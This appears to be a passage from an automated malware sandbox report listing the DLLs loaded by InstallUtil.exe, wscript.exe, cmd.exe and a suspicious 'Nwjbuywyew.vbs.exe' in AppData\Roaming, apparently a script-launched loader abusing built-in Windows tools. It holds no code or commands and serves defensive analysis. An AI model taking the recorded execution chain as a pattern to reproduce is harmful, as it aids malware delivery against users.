Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: twext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cscui.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: shacct.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: idstore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: starttiledata.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wlidprov.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: provsvc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: acppage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: aepic.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: atl.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
